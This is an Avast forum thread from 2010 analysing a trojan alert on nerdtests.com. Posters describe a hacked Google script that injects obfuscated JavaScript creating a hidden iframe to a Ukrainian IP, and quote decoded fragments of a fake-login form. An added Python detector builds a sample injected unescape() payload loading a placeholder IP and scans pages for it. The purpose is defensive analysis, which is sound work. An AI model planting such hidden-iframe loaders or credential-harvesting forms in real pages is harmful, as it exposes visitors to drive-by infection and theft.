Avast WEBforum

Other => Viruses and worms => Topic started by: Ruuga on July 07, 2010, 09:17:17 PM

Title: Nerdtests and Avast: Probably F/P?
Post by: Ruuga on July 07, 2010, 09:17:17 PM
So today I tried to open this site but avast thinks there is a trojan. I'm using Avast 5 but I didn't get the alarm when I was using version 4. Avast also sends an alarm if you type the URL into Google. My friend also said that he got an alert with Avast 5.
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: Pondus on July 07, 2010, 09:34:51 PM
VirusTotal - nerdtests.com.htm - 4/41
http://www.virustotal.com/analisis/cfeaba2eb3758ea4391bf7d660c46988b158ff2e4d55fa98adf6122fdc4cf4d5-1278531118

This page seems to be <suspicious> 1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.nerdtests.com

NoVirusThanks - 3/16 - INFECTED
http://scanner.novirusthanks.org/analysis/8f4cbf447ed17e0c695a7846d4c1cc68/aW5kZXg=/

Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=a87ad2e60b4d1f2e09c65aea9d65e5ab&t=1278531513&type=js
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 07, 2010, 10:00:50 PM
There appears to be one of the Google script tags which has been hacked (2nd to last in the page code, see image1), inserting a long line of obfuscated JavaScript.

This script, when decoded (image2), creates a hidden iframe tag that tries to open an IP in the Ukraine, which is highly suspect.

So I believe that the detection is good.
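A defender-side check for the pattern DavidR describes (an inline script whose `unescape()` literal decodes to a hidden iframe), added here as an example that is not part of this thread or of any scanner mentioned in it. The sample page, the `/in.php` path and the IP 192.0.2.10 (a documentation placeholder, not the real address) are constructed for the demonstration.

```python
import re
# Constructed sample (not the real nerdtests.com markup): a normal Google Analytics tag,
# then an injected inline script whose unescape() payload decodes to a 1x1 hidden iframe.
_INJECTED = ('<iframe src="http://192.0.2.10/in.php" width="1" height="1" '
             'style="visibility:hidden"></iframe>')
_ESCAPED = "".join("%%%02X" % ord(c) for c in _INJECTED)   # "%3C%69%66..."
SAMPLE_HTML = f"""<html><body>
<script src="http://www.google-analytics.com/ga.js"></script>
<script>document.write(unescape("{_ESCAPED}"));</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def js_unescape(s: str) -> str:
    """Decode %uXXXX and %XX sequences in one left-to-right pass, as unescape() does."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def iframe_attrs(tag: str) -> dict:
    return {k.lower(): (a or b or c) for k, a, b, c in ATTR_RE.findall(tag)}

def is_hidden_iframe(tag: str) -> bool:
    """Tiny (<=1px) or invisible frames are the drive-by loader shape described above."""
    a = iframe_attrs(tag)
    dims = [a.get(d, "").strip("px ") for d in ("width", "height")]
    tiny = all(v.isdigit() and int(v) <= 1 for v in dims)
    style = a.get("style", "").replace(" ", "").lower()
    return tiny or "visibility:hidden" in style or "display:none" in style

def scan_page(page: str) -> list:
    """Findings for inline scripts whose unescape() literal decodes to a hidden iframe."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(page):
        if re.search(r"\bsrc\s*=", attrs, re.I):
            continue                       # external script: only inline bodies inspected
        for _quote, literal in UNESCAPE_RE.findall(body):
            decoded = js_unescape(literal)
            for tag in IFRAME_RE.findall(decoded):
                if is_hidden_iframe(tag):
                    findings.append({"src": iframe_attrs(tag).get("src", ""),
                                     "decoded": decoded})
    return findings
if __name__ == "__main__":
    for f in scan_page(SAMPLE_HTML):
        print("hidden iframe injected via unescape(), loading", f["src"])
```

Run against a saved copy of a page, it surfaces the decoded tag and the remote `src` so the frame's destination can be checked before anyone decides the alert is a false positive.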
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: polonus on July 08, 2010, 12:02:10 AM
Hi DavidR,

And what does that long unescape string do? Well, that is hexadecimal-coded JavaScript commands that decode to lines such as: <FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 08, 2010, 02:19:59 AM
What it does is shown in the last image and in what I said in the post (which seems to differ from your example): it creates a hidden iframe and connects to an IP in the Ukraine. After that I don't care what it does, just that avast has, in my mind, done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj]).

Even if your explanation is right it is still a good detection by avast, I just don't go to any depth when I find what I consider is enough evidence to confirm a good detection.
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: Lisandro on July 13, 2010, 03:17:32 AM
You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/
Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 13, 2010, 05:03:16 AM
Thanks for the notice, Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D